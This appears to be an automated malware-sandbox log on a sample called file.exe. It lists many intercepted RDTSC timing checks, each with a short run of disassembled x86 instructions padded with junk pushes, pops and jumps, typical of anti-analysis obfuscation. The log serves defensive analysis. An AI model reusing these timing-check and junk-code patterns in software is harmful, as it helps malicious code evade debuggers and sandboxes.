Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C010D8 second address: C0113B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FE4211E2AB8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 sbb bx, C31Bh 0x0000001b push 00000000h 0x0000001d cld 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FE4211E2AB8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a call 00007FE4211E2AC6h 0x0000003f pop ebx 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 pop eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00374 second address: C0037E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C032F0 second address: C032F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C032F6 second address: C03340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FE420CEA00Ah 0x00000012 mov edi, edx 0x00000014 push 00000000h 0x00000016 mov edi, 12A76B3Ch 0x0000001b push 00000000h 0x0000001d mov bx, 1688h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jc 00007FE420CEA01Eh 0x00000029 jmp 00007FE420CEA018h 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C01326 second address: C0134E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE4211E2AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FE4211E2AC7h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04434 second address: C04438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C034FF second address: C03513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FE4211E2AB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04438 second address: C0443E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C03513 second address: C03518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0443E second address: C04443 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C03518 second address: C0351E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C035D6 second address: C035E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C605 second address: C0C60A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C79B second address: C0C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA68 second address: C0CA72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA72 second address: C0CA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109A6 second address: C109AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109AA second address: C109C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA013h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109C1 second address: C109EB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4211E2AC1h 0x00000008 jmp 00007FE4211E2ABBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FE4211E2ABAh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C109EB second address: C109F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16893 second address: C1689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1689A second address: C168C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FE420CEA00Bh 0x00000010 jbe 00007FE420CEA017h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE0C second address: BAAE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE12 second address: BAAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA012h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE2C second address: BAAE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15494 second address: C15498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15498 second address: C154AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4211E2ABDh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C154AF second address: C154F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA018h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE420CEA00Fh 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FE420CEA00Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C154F0 second address: C154F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15AB5 second address: C15ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15D5E second address: C15D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2ABBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16088 second address: C1608C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1608C second address: C160B3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4211E2AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FE4211E2AC2h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160B3 second address: C160B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160B7 second address: C160C1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160C1 second address: C160DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA017h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160DE second address: C160E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160E2 second address: C16116 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE420CEA017h 0x00000010 jmp 00007FE420CEA00Eh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162A3 second address: C162B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162B1 second address: C162B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162B7 second address: C162C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162C3 second address: C162CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162CC second address: C162D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162D2 second address: C162D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A790 second address: C1A7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE4211E2AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7A2 second address: C1A7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7A6 second address: C1A7AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7AC second address: C1A7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE2E second address: C1AE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007FE4211E2AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE42 second address: C1AE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE49 second address: C1AE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B179 second address: C1B17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B17F second address: C1B186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B186 second address: C1B197 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE420CEA00Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B197 second address: C1B19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B19D second address: C1B1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE420CEA006h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE420CEA010h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1C1 second address: C1B1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1C5 second address: C1B1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B610 second address: C1B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FE4211E2AC7h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1FEBC second address: C1FEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA018h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE420CEA00Eh 0x0000000f push ecx 0x00000010 je 00007FE420CEA006h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2002B second address: C20031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1FB8C second address: C1FBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE420CEA013h 0x0000000b jno 00007FE420CEA006h 0x00000011 jns 00007FE420CEA006h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C20848 second address: C20857 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C20857 second address: C2085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209D1 second address: C209E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209E3 second address: C209EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209EB second address: C209EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209EF second address: C20A08 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE420CEA00Bh 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29FD4 second address: C29FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 jg 00007FE4211E2AB6h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA928B second address: BA9295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA9295 second address: BA929C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE97E3 second address: BE97E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE99E7 second address: BE99F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE99F8 second address: BE9A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9DE2 second address: BE9DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9DFD second address: BE9E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E01 second address: BE9E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E05 second address: BE9E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E13 second address: BE9E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E17 second address: BE9E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9EA2 second address: BE9EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FE4211E2AC4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FE4211E2ABEh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007FE4211E2AC4h 0x00000020 pop eax 0x00000021 sbb di, C26Ah 0x00000026 call 00007FE4211E2AB9h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9EFE second address: BE9F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F16 second address: BE9F43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4211E2ABCh 0x00000008 jc 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 jno 00007FE4211E2AB8h 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FE4211E2ABCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F43 second address: BE9F60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA011h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F60 second address: BE9F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA049 second address: BEA04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA1CC second address: BEA20B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FE4211E2ACAh 0x00000010 jmp 00007FE4211E2AC4h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA20B second address: BEA22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FE420CEA00Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC07 second address: BEAC51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FE4211E2AB8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, 4F79BE00h 0x00000029 lea eax, dword ptr [ebp+1247E51Fh] 0x0000002f mov ecx, edi 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push esi 0x00000037 pop esi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC51 second address: BEAC5B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
